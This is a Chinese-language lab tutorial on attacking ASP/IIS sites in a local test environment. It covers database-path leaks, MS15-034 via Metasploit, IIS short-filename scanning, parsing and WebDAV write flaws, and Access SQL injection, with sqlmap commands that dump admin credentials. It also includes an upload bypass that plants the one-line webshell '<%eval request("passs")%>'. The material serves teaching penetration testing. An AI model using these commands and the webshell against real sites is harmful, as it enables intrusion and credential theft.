041-WEB攻防-ASP应用&HTTP.SYS&短文件&文件解析&Access注入&数据库泄漏

这篇具有很好参考价值的文章主要介绍了041-WEB攻防-ASP应用&HTTP.SYS&短文件&文件解析&Access注入&数据库泄漏。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

041-WEB攻防-ASP应用&HTTP.SYS&短文件&文件解析&Access注入&数据库泄漏

攻防 asp 可利用文件,前端,http,数据库

#知识点:

1、ASP-SQL注入-Access数据库
2、ASP-默认安装-数据库泄漏下载
3、ASP-IIS-CVE&短文件&解析&写入

演示案例:

➢ASP-默认安装-MDB数据库泄漏下载
➢ASP-中间件-CVE&短文件&解析&写权限
➢ASP-SQL注入-SQLMAP使用&ACCESS注入

#ASP-默认安装-MDB数据库泄漏下载

  • 由于大部分ASP程序与ACCESS数据库搭建,但ACCESS无需连接
  • 在==脚本文件中定义配置好数据库路径即用不需要额外配置安装数据库==
  • 提前固定好的数据库路径如默认未修改
  • 当攻击者知道数据库的完整路径,可远程下载后解密数据实现攻击。

1,打开虚拟机环境2003 企业版 32位 IIS 6.0 CN

2,右键我的电脑打开管理,选择Internet信息服务(IIS)→网站

3,选择对应的fyblogs_3.0 网站,查看分配的ip地址

4,通过其他主机访问该IP地址

5,成功访问后,通过访问对应下载路径,直接下载`#data.mdb文件

http://192.168.200.140:81**/database/%23data.mdb**

6,打开文件,发现其中==泄露用户名密码==等信息

攻防 asp 可利用文件,前端,http,数据库

攻防 asp 可利用文件,前端,http,数据库

攻防 asp 可利用文件,前端,http,数据库

遇到问题:打开网址不能在正常打开

攻防 asp 可利用文件,前端,http,数据库

解决:将属性中的ip地址重新分配即可

攻防 asp 可利用文件,前端,http,数据库

攻防 asp 可利用文件,前端,http,数据库

#ASP-中间件-CVE&短文件&解析&写权限

攻防 asp 可利用文件,前端,http,数据库

HTTP.SYS(CVE-2015-1635)

1、漏洞描述

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

2、影响版本

Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2

3、漏洞利用条件

安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本

4、漏洞复现
  • msfconsole

    是==Metasploit Framework的命令行界面==,它是一个功能强大的渗透测试工具和漏洞利用框架。Metasploit Framework旨在帮助安全专业人员评估和测试计算机系统的安全性,包括发现漏洞、开发和执行攻击、获取远程访问权限等。

  • use auxiliary/dos/http/ms15_034_ulonglongadd

    是Metasploit Framework中的一个辅助模块,用于执行针对MS15-034漏洞(也称为HTTP.sys远程代码执行漏洞)的拒绝服务(DoS)攻击。这个漏洞影响Windows操作系统中的HTTP堆栈,攻击者可以通过发送特制的HTTP请求导致**目标系统崩溃,从而实现拒绝服务攻击。**

  • set rhosts xx.xx.xx.xx
    set rport xx
    run

攻防 asp 可利用文件,前端,http,数据库

攻防 asp 可利用文件,前端,http,数据库

攻防 asp 可利用文件,前端,http,数据库

IIS短文件

1、漏洞描述

此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息

攻防 asp 可利用文件,前端,http,数据库

2、漏洞成因:

为了兼容16位MS-DOS程序,Windows为文件名较长的文件(和文件夹)生成了对应的windows 8.3短文件名。在Windows下查看对应的短文件名,可以使用命令**dir /x**

攻防 asp 可利用文件,前端,http,数据库

3、应用场景:

后台路径获取,数据库文件获取,其他敏感文件获取等

python iis_shortname_scan.py [http://192.168.200.140:88/](http://192.168.200.140:88/)

  • 选择对应的powereasy 网站,查看分配的ip地址
  • 借助工具,输入执行语句和目标ip执行扫描
  • 获取到对应的网站目录

攻防 asp 可利用文件,前端,http,数据库

攻防 asp 可利用文件,前端,http,数据库

攻防 asp 可利用文件,前端,http,数据库

4、利用工具:

https://github.com/lijiejie/IIS_shortname_Scanner

IIS文件解析

  • IIS 6 解析漏洞→可以上传木马文件,以图片形式或文件夹形式替换格式

    • 1、该版本默认会将***.asp;.jpg** 此种格式的文件名,当成Asp解析

      攻防 asp 可利用文件,前端,http,数据库

      攻防 asp 可利用文件,前端,http,数据库

    攻防 asp 可利用文件,前端,http,数据库

    • 2、该版本默认会将***.asp/目录下的所有文件当成Asp解析**。
      如:logo.asp;.jpg xx.asp/logo.jpg

      攻防 asp 可利用文件,前端,http,数据库

    攻防 asp 可利用文件,前端,http,数据库

    攻防 asp 可利用文件,前端,http,数据库

  • IIS 7.x 解析漏洞

    • 在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php文件
      应用场景:配合文件上传获取Webshell

IIS写权限

  • IIS<=6.0 目录权限开启写入,开启WebDAV,设置为允许
  • 可以通过提交put包,进行写入文件(可置入木马,获得权限)
    参考利用:https://cloud.tencent.com/developer/article/2050105

攻防 asp 可利用文件,前端,http,数据库

攻防 asp 可利用文件,前端,http,数据库

攻防 asp 可利用文件,前端,http,数据库

攻防 asp 可利用文件,前端,http,数据库

攻防 asp 可利用文件,前端,http,数据库

#ASP-SQL注入-SQLMAP使用&ACCESS注入

  1. ACCESS数据库无管理帐号密码,顶级架构为表名,列名(字段),数据
  2. 所以在注入猜解中一般采用字典猜解表和列再获取数据,猜解简单但又可能出现猜解不到的情况
  3. Access数据库在当前安全发展中已很少存在,故直接使用SQLMAP注入,后续再说其他。

攻防 asp 可利用文件,前端,http,数据库

1.打开对应的UploadParsing网址,并使用其分配的IP进行访问

攻防 asp 可利用文件,前端,http,数据库

2.源码中,没有进行sql语句的过滤直接拼接,造成有注入风险

  • http://192.168.200.140:89**/Pic.asp?classid=3**

    攻防 asp 可利用文件,前端,http,数据库

3.使用sqlmap工具进行sql注入

  • G:\develop\safety\ONE-FOX集成工具箱_V3.0魔改版_by狐狸\gui_scan\sqlmap

  • python sqlmap.py -u “” --tables //获取表名
    python sqlmap.py -u “” --cloumns -T admin //获取admin表名下的列名
    python sqlmap.py -u “” --dump -C “username,password” -T admin //获取表名下的列名数据

  • python .\sqlmap.py -u “http://192.168.200.140:89/Pic.asp?classid=3” --tables

    • python .\\sqlmap.py: 启动 SQLMap 工具,使用 Python 解释器运行。

    • u "<http://192.168.200.140:89/Pic.asp?classid=3>": 指定目标 URL,即要测试的网站地址。在这个例子中,目标 URL 是 http://192.168.200.140:89/Pic.asp?classid=3u 选项用于指定 URL。

    • -tables: 指定 SQLMap 工具执行的任务,这里是获取数据库中的所有表。-tables 选项用于请求表的信息。

    • 提示有注入点

      攻防 asp 可利用文件,前端,http,数据库

  • 它询问是否要使用常见的表存在性检查方法

    • do you want to use common table existence check? [Y/n/q] y

    • 选择要使用的常见表文件的提示。用户可以选择默认的常见表文件,也可以选择自定义的常见表文件。

    • 询问用户要设置多少个线程进行测试

    • please enter number of threads? [Enter for 1 (current)] 输入10

      攻防 asp 可利用文件,前端,http,数据库

攻防 asp 可利用文件,前端,http,数据库

攻防 asp 可利用文件,前端,http,数据库

  • python .[sqlmap.py](http://sqlmap.py/) -u “http://192.168.200.140:89/Pic.asp?classid=3” --columns -T admin

    • -columns: 这是 SQLMap 的一个选项,用于指示工具查找指定表的列。

    • T admin: 这是 SQLMap 的另一个选项,用于指定目标表的名称。在这里,它是 “admin” 表。

      攻防 asp 可利用文件,前端,http,数据库

      攻防 asp 可利用文件,前端,http,数据库

  • python .[sqlmap.py](http://sqlmap.py/) -u “http://192.168.200.140:89/Pic.asp?classid=3” --dump -C “username,password” -T admin

    • -dump: 这是 SQLMap 的选项,用于指示工具从数据库中检索数据。

    • C "username,password": 这是 SQLMap 的选项,用于指定要检索的列的名称。在这里,它是 “username” 和 “password” 列。

    • 得出如下的用户名和密码

      攻防 asp 可利用文件,前端,http,数据库

  • 由于密码是MD5加密的

    使用解密解密出密码

    攻防 asp 可利用文件,前端,http,数据库

    攻防 asp 可利用文件,前端,http,数据库

4.使用IIS短目录或**目录扫描(7kbscan御剑版)**扫描找到后台登录页面

攻防 asp 可利用文件,前端,http,数据库

  • python iis_shortname_scan.py http://192.168.200.140:89/

    • 扫描出一些目录

    • 一一进行访问在访问时发现:http://192.168.200.140:89/upfile.asp

    • 会跳转到后台登录页面:http://192.168.200.140:89**/Tcnet/Admin_Login.asp**

      攻防 asp 可利用文件,前端,http,数据库

      攻防 asp 可利用文件,前端,http,数据库

      攻防 asp 可利用文件,前端,http,数据库

  • 目录扫描(7kbscan御剑版)

    • 直接将目标地址写入

    • 选择对应的字典类型和显示结果

    • 发现有跳转的页面直接访问至后台

      攻防 asp 可利用文件,前端,http,数据库

      攻防 asp 可利用文件,前端,http,数据库

  • 网站爬虫

    • 直接在网址检测中点击文件,查看目录和文件结构
    • 直接查看网站前端源码

攻防 asp 可利用文件,前端,http,数据库

攻防 asp 可利用文件,前端,http,数据库

攻防 asp 可利用文件,前端,http,数据库

5.登录后台页面

攻防 asp 可利用文件,前端,http,数据库

6.模拟漏洞上传测试(只需要了解后面还会讲)

  • 分别开启burp和浏览器的代理和端口

    攻防 asp 可利用文件,前端,http,数据库

    攻防 asp 可利用文件,前端,http,数据库

  • 上传普通的小的照片

    攻防 asp 可利用文件,前端,http,数据库

    攻防 asp 可利用文件,前端,http,数据库

    攻防 asp 可利用文件,前端,http,数据库

    攻防 asp 可利用文件,前端,http,数据库

  • 进行抓包,将包中的有关文件路径的内容,拼接上去**/1.asp;.(可以将木马文件,替换为该格式)**

  • 再次抓包

    攻防 asp 可利用文件,前端,http,数据库

    攻防 asp 可利用文件,前端,http,数据库

    攻防 asp 可利用文件,前端,http,数据库

  • 将照片路径替换为:192.168.126.131:89**/1.asp;.20235192154599715.png**

    • 发现可以被当成Asp正常解析

    • 在抓包的后面加上木马程序的内容**<%eval request(”passs”)%>**

      1. <%%>: 这是ASP脚本中的定界符,用于标识服务器端代码的开始和结束。
      2. eval: 这是一个函数或操作符,用于执行动态生成的代码。在这里,它被用于执行后面括号中的内容。
      3. request("passs"): 这部分看起来是从请求中获取名为 “passs” 的参数的值。request 是用于获取请求参数的对象,而 “passs” 是参数的名称。

      总体来说,这段代码的作用是从请求中获取名为 “passs” 的参数的值,并使用 eval 函数执行它。这种构造可能导致安全风险,特别是如果用户能够控制传递给 “passs” 参数的内容。eval 的使用通常被认为是不安全的,因为它允许执行任意的动态代码,可能导致代码注入攻击。

    • 使用哥斯拉,利用木马文件获得权限成功

      攻防 asp 可利用文件,前端,http,数据库

      攻防 asp 可利用文件,前端,http,数据库

      攻防 asp 可利用文件,前端,http,数据库

      攻防 asp 可利用文件,前端,http,数据库文章来源地址https://www.toymoban.com/news/detail-850054.html

到了这里,关于041-WEB攻防-ASP应用&HTTP.SYS&短文件&文件解析&Access注入&数据库泄漏的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • day33WEB 攻防-通用漏洞&;文件上传&;中间件解析漏洞&;编辑器安全

    先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7 深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前! 因此收集整理了一份《2024年最新网络安全全套学习资料》

    2024年04月24日
    浏览(45)
  • day33WEB 攻防-通用漏洞&;文件上传&;中间件解析漏洞&;编辑器安全(1)

    2、解析漏洞-nginx.conf 配置不当 二,Web 应用编辑器-Ueditor 文件上传安全 三,实例 CMS平台-中间件解析编辑器引用 配套资源下载(百度网盘): 链接:https://pan.baidu.com/s/11Q9sAPQ9P_ReOP9PKL0ABg?pwd=jgg4  提取码:jgg4 本章节知识点: 1 、中间件安全问题 2 、中间件文件上传解析 3 、

    2024年04月15日
    浏览(76)
  • 【已解决】无法在web.xml或使用此应用程序部署的jar文件中解析绝对uri:[http://java.sun.com/jsp/jstl/core]

    解决时间:2023/3/31,我使用的tomcat是8.5版本的,在整合SSM项目时在jsp中使用JSTL的核心标签库 - core,也就是使用 c:forEach 标签遍历出现了这个问题: 无法在web.xml或使用此应用程序部署的jar文件中解析绝对uri 不知道该怎么说明这个bug,因为我已经在网上试过很多方法了。 比如

    2024年02月07日
    浏览(56)
  • 28、web攻防——通用漏洞&SQL注入&HTTP头XFF&COOKIE&POST请求

    $_GET :接收get请求,传输少量数据,URL是有长度限制的; $_POST :接收post请求; $_COOKIE :接收cookie,用于身份验证; $_REQUEST :收集通过 GET 、POST和COOKIE 方法发送的表单数据; $_SERVER :接收数据包中的一些内容,如浏览器信息、当前访问url地址等; 网站功能点: 后台要记录

    2024年01月19日
    浏览(42)
  • HTTP与HTTPS:深度解析两种网络协议的工作原理、安全机制、性能影响与现代Web应用中的重要角色

    HTTP (HyperText Transfer Protocol) 和 HTTPS (Hypertext Transfer Protocol Secure) 是互联网通信中不可或缺的两种协议,它们共同支撑了全球范围内的Web内容传输与交互。本文将深度解析HTTP与HTTPS的工作原理、安全机制、性能影响,并探讨它们在现代Web应用中的核心角色。 HTTP 是一种应用层协议

    2024年04月11日
    浏览(47)
  • Web应用安全攻防战:识别十大威胁,掌握防护要点

    OWASP(Open Worldwide Application Security Project)是一家致力于应用安全威胁研究的非盈利机构。通过对超过20万个组织进行调研分析,该机构每三年左右就会发布一次《Web应用安全风险Top10》报告,这个报告已经成为全球企业开展Web应用安全防护时的重要参考。然而最近,卡巴斯基的

    2024年04月16日
    浏览(62)
  • 第52天:WEB攻防-通用漏洞&弱口令安全&社工字典生成&服务协议&Web应用

    思维导图 前置知识 案例一:Zblog-密文 MD5 传输加密猜解 案例二:服务类-SSHRDP 远程终端猜解 案例三:应用类-ZIPWord 文件压缩包猜解 案例四:github上收集的常见服务器设备,协议,以及常见平台默认密码 产生原因: 安全意识:自己设置的xiaojie123弱密码 初始化:初始密码为

    2024年04月14日
    浏览(34)
  • Mojo:为Web应用程序提供了完整的框架,包括路由、模板、插件、Websocket、HTTP客户端、HTTP服务器、配置文件管理等功能

            Mojo是一种高级的、动态的Perl Web应用程序框架,它可以用来开发Web应用程序,定位于速度、简单和可扩展性。Mojo的设计理念是简洁、灵活、易用和高效,它为Web应用程序提供了完整的框架,包括路由、模板、插件、Websocket、HTTP客户端、HTTP服务器、配置文件管理等

    2024年02月09日
    浏览(49)
  • ASP.net web应用 GridView控件常用方法

    GridView 控件是 ASP.NET Web Forms 中常用的数据展示控件之一。它提供了一个网格形式的表格,用于显示和编辑数据。GridView 控件对于包含大量数据、需要进行分页、排序和筛选的情况非常有用。 GridView 控件的主要特性包括: 数据绑定:GridView 可以与各种数据源进行绑定,如数据

    2024年02月09日
    浏览(26)
  • 051-WEB攻防-前后台功能点&文件下载&文件读取&文件删除&目录遍历&目录穿越

    1、文件安全-前后台功能点-下载读取删除 2、目录安全-前后台功能点-目录遍历目录穿越 演示案例: ➢文件安全-下载删除-案例黑白盒 ➢目录安全-遍历穿越-案例黑白盒 1、下载=读取(获取源码) 文件下载 利用:下载敏感文件(数据库配置,中间件配置,系统密匙等文件信息

    2024年03月10日
    浏览(55)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包